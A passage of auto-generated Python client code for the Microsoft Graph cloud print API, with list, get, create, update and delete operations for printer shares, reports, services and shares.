401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_printer_shares.metadata['url'] # type: ignore
path_format_arguments = {
'printerShare-id': self._serialize.url("printer_share_id", printer_share_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'MicrosoftGraphPrinterShare')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
update_printer_shares.metadata = {'url': '/print/printerShares/{printerShare-id}'} # type: ignore
def delete_printer_shares(
self,
printer_share_id, # type: str
if_match=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> None
"""Delete navigation property printerShares for print.
Delete navigation property printerShares for print.
:param printer_share_id: key: id of printerShare.
:type printer_share_id: str
:param if_match: ETag.
:type if_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.delete_printer_shares.metadata['url'] # type: ignore
path_format_arguments = {
'printerShare-id': self._serialize.url("printer_share_id", printer_share_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete_printer_shares.metadata = {'url': '/print/printerShares/{printerShare-id}'} # type: ignore
def list_reports(
self,
orderby=None, # type: Optional[List[Union[str, "models.Enum72"]]]
select=None, # type: Optional[List[Union[str, "models.Enum73"]]]
expand=None, # type: Optional[List[Union[str, "models.Enum74"]]]
**kwargs # type: Any
):
# type: (...) -> Iterable["models.CollectionOfReportRoot"]
"""Get reports from print.
Get reports from print.
:param orderby: Order items by property values.
:type orderby: list[str or ~devices_cloud_print.models.Enum72]
:param select: Select properties to be returned.
:type select: list[str or ~devices_cloud_print.models.Enum73]
:param expand: Expand related entities.
:type expand: list[str or ~devices_cloud_print.models.Enum74]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either CollectionOfReportRoot or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~devices_cloud_print.models.CollectionOfReportRoot]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.CollectionOfReportRoot"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_reports.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if self._config.top is not None:
query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
if self._config.skip is not None:
query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
if self._config.search is not None:
query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
if self._config.filter is not None:
query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
if self._config.count is not None:
query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('CollectionOfReportRoot', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.odata_next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.OdataError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_reports.metadata = {'url': '/print/reports'} # type: ignore
def create_reports(
self,
body, # type: "models.MicrosoftGraphReportRoot"
**kwargs # type: Any
):
# type: (...) -> "models.MicrosoftGraphReportRoot"
"""Create new navigation property to reports for print.
Create new navigation property to reports for print.
:param body: New navigation property.
:type body: ~devices_cloud_print.models.MicrosoftGraphReportRoot
:keyword callable cls: A custom type or function that will be passed the direct response
:return: MicrosoftGraphReportRoot, or the result of cls(response)
:rtype: ~devices_cloud_print.models.MicrosoftGraphReportRoot
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.MicrosoftGraphReportRoot"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_reports.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'MicrosoftGraphReportRoot')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('MicrosoftGraphReportRoot', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_reports.metadata = {'url': '/print/reports'} # type: ignore
def get_reports(
self,
report_root_id, # type: str
select=None, # type: Optional[List[Union[str, "models.Enum75"]]]
expand=None, # type: Optional[List[Union[str, "models.Enum76"]]]
**kwargs # type: Any
):
# type: (...) -> "models.MicrosoftGraphReportRoot"
"""Get reports from print.
Get reports from print.
:param report_root_id: key: id of reportRoot.
:type report_root_id: str
:param select: Select properties to be returned.
:type select: list[str or ~devices_cloud_print.models.Enum75]
:param expand: Expand related entities.
:type expand: list[str or ~devices_cloud_print.models.Enum76]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: MicrosoftGraphReportRoot, or the result of cls(response)
:rtype: ~devices_cloud_print.models.MicrosoftGraphReportRoot
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.MicrosoftGraphReportRoot"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.get_reports.metadata['url'] # type: ignore
path_format_arguments = {
'reportRoot-id': self._serialize.url("report_root_id", report_root_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('MicrosoftGraphReportRoot', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_reports.metadata = {'url': '/print/reports/{reportRoot-id}'} # type: ignore
def update_reports(
self,
report_root_id, # type: str
body, # type: "models.MicrosoftGraphReportRoot"
**kwargs # type: Any
):
# type: (...) -> None
"""Update the navigation property reports in print.
Update the navigation property reports in print.
:param report_root_id: key: id of reportRoot.
:type report_root_id: str
:param body: New navigation property values.
:type body: ~devices_cloud_print.models.MicrosoftGraphReportRoot
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_reports.metadata['url'] # type: ignore
path_format_arguments = {
'reportRoot-id': self._serialize.url("report_root_id", report_root_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'MicrosoftGraphReportRoot')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
update_reports.metadata = {'url': '/print/reports/{reportRoot-id}'} # type: ignore
def delete_reports(
self,
report_root_id, # type: str
if_match=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> None
"""Delete navigation property reports for print.
Delete navigation property reports for print.
:param report_root_id: key: id of reportRoot.
:type report_root_id: str
:param if_match: ETag.
:type if_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.delete_reports.metadata['url'] # type: ignore
path_format_arguments = {
'reportRoot-id': self._serialize.url("report_root_id", report_root_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete_reports.metadata = {'url': '/print/reports/{reportRoot-id}'} # type: ignore
def list_services(
self,
orderby=None, # type: Optional[List[Union[str, "models.Enum77"]]]
select=None, # type: Optional[List[Union[str, "models.Enum78"]]]
expand=None, # type: Optional[List[Union[str, "models.Enum79"]]]
**kwargs # type: Any
):
# type: (...) -> Iterable["models.CollectionOfPrintService"]
"""Get services from print.
Get services from print.
:param orderby: Order items by property values.
:type orderby: list[str or ~devices_cloud_print.models.Enum77]
:param select: Select properties to be returned.
:type select: list[str or ~devices_cloud_print.models.Enum78]
:param expand: Expand related entities.
:type expand: list[str or ~devices_cloud_print.models.Enum79]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either CollectionOfPrintService or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~devices_cloud_print.models.CollectionOfPrintService]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.CollectionOfPrintService"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_services.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if self._config.top is not None:
query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
if self._config.skip is not None:
query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
if self._config.search is not None:
query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
if self._config.filter is not None:
query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
if self._config.count is not None:
query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('CollectionOfPrintService', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.odata_next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.OdataError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_services.metadata = {'url': '/print/services'} # type: ignore
def create_services(
self,
body, # type: "models.MicrosoftGraphPrintService"
**kwargs # type: Any
):
# type: (...) -> "models.MicrosoftGraphPrintService"
"""Create new navigation property to services for print.
Create new navigation property to services for print.
:param body: New navigation property.
:type body: ~devices_cloud_print.models.MicrosoftGraphPrintService
:keyword callable cls: A custom type or function that will be passed the direct response
:return: MicrosoftGraphPrintService, or the result of cls(response)
:rtype: ~devices_cloud_print.models.MicrosoftGraphPrintService
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.MicrosoftGraphPrintService"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_services.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'MicrosoftGraphPrintService')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('MicrosoftGraphPrintService', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_services.metadata = {'url': '/print/services'} # type: ignore
def get_services(
self,
print_service_id, # type: str
select=None, # type: Optional[List[Union[str, "models.Enum80"]]]
expand=None, # type: Optional[List[Union[str, "models.Enum81"]]]
**kwargs # type: Any
):
# type: (...) -> "models.MicrosoftGraphPrintService"
"""Get services from print.
Get services from print.
:param print_service_id: key: id of printService.
:type print_service_id: str
:param select: Select properties to be returned.
:type select: list[str or ~devices_cloud_print.models.Enum80]
:param expand: Expand related entities.
:type expand: list[str or ~devices_cloud_print.models.Enum81]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: MicrosoftGraphPrintService, or the result of cls(response)
:rtype: ~devices_cloud_print.models.MicrosoftGraphPrintService
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.MicrosoftGraphPrintService"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.get_services.metadata['url'] # type: ignore
path_format_arguments = {
'printService-id': self._serialize.url("print_service_id", print_service_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('MicrosoftGraphPrintService', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_services.metadata = {'url': '/print/services/{printService-id}'} # type: ignore
def update_services(
self,
print_service_id, # type: str
body, # type: "models.MicrosoftGraphPrintService"
**kwargs # type: Any
):
# type: (...) -> None
"""Update the navigation property services in print.
Update the navigation property services in print.
:param print_service_id: key: id of printService.
:type print_service_id: str
:param body: New navigation property values.
:type body: ~devices_cloud_print.models.MicrosoftGraphPrintService
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_services.metadata['url'] # type: ignore
path_format_arguments = {
'printService-id': self._serialize.url("print_service_id", print_service_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'MicrosoftGraphPrintService')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
update_services.metadata = {'url': '/print/services/{printService-id}'} # type: ignore
def delete_services(
self,
print_service_id, # type: str
if_match=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> None
"""Delete navigation property services for print.
Delete navigation property services for print.
:param print_service_id: key: id of printService.
:type print_service_id: str
:param if_match: ETag.
:type if_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.delete_services.metadata['url'] # type: ignore
path_format_arguments = {
'printService-id': self._serialize.url("print_service_id", print_service_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete_services.metadata = {'url': '/print/services/{printService-id}'} # type: ignore
def list_shares(
self,
orderby=None, # type: Optional[List[Union[str, "models.Enum85"]]]
select=None, # type: Optional[List[Union[str, "models.Enum86"]]]
expand=None, # type: Optional[List[Union[str, "models.Enum87"]]]
**kwargs # type: Any
):
# type: (...) -> Iterable["models.CollectionOfPrinterShare1"]
"""Get shares from print.
Get shares from print.
:param orderby: Order items by property values.
:type orderby: list[str or ~devices_cloud_print.models.Enum85]
:param select: Select properties to be returned.
:type select: list[str or ~devices_cloud_print.models.Enum86]
:param expand: Expand related entities.
:type expand: list[str or ~devices_cloud_print.models.Enum87]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either CollectionOfPrinterShare1 or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~devices_cloud_print.models.CollectionOfPrinterShare1]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.CollectionOfPrinterShare1"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_shares.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if self._config.top is not None:
query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
if self._config.skip is not None:
query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
if self._config.search is not None:
query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
if self._config.filter is not None:
query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
if self._config.count is not None:
query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('CollectionOfPrinterShare1', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.odata_next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.OdataError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_shares.metadata = {'url': '/print/shares'} # type: ignore
def create_shares(
self,
body, # type: "models.MicrosoftGraphPrinterShare"
**kwargs # type: Any
):
# type: (...) -> "models.MicrosoftGraphPrinterShare"
"""Create new navigation property to shares for print.
Create new navigation property to shares for print.
:param body: New navigation property.
:type body: ~devices_cloud_print.models.MicrosoftGraphPrinterShare
:keyword callable cls: A custom type or function that will be passed the direct response
:return: MicrosoftGraphPrinterShare, or the result of cls(response)
:rtype: ~devices_cloud_print.models.MicrosoftGraphPrinterShare
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.MicrosoftGraphPrinterShare"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_shares.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'MicrosoftGraphPrinterShare')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('MicrosoftGraphPrinterShare', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_shares.metadata = {'url': '/print/shares'} # type: ignore
def get_shares(
self,
printer_share_id, # type: str
select=None, # type: Optional[List[Union[str, "models.Enum88"]]]
expand=None, # type: Optional[List[Union[str, "models.Enum89"]]]
**kwargs # type: Any
):
# type: (...) -> "models.MicrosoftGraphPrinterShare"
"""Get shares from print.
Get shares from print.
:param printer_share_id: key: id of printerShare.
:type printer_share_id: str
:param select: Select properties to be returned.
:type select: list[str or ~devices_cloud_print.models.Enum88]
:param expand: Expand related entities.
:type expand: list[str or ~devices_cloud_print.models.Enum89]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: MicrosoftGraphPrinterShare, or the result of cls(response)
:rtype: ~devices_cloud_print.models.MicrosoftGraphPrinterShare
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.MicrosoftGraphPrinterShare"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.get_shares.metadata['url'] # type: ignore
path_format_arguments = {
'printerShare-id': self._serialize.url("printer_share_id", printer_share_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('MicrosoftGraphPrinterShare', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_shares.metadata = {'url': '/print/shares/{printerShare-id}'} # type: ignore
def update_shares(
self,
printer_share_id, # type: str
body, # type: "models.MicrosoftGraphPrinterShare"
**kwargs # type: Any
):
# type: (...) -> None
"""Update the navigation property shares in print.
Update the navigation property shares in print.
:param printer_share_id: key: id of printerShare.
:type printer_share_id: str
:param body: New navigation property values.
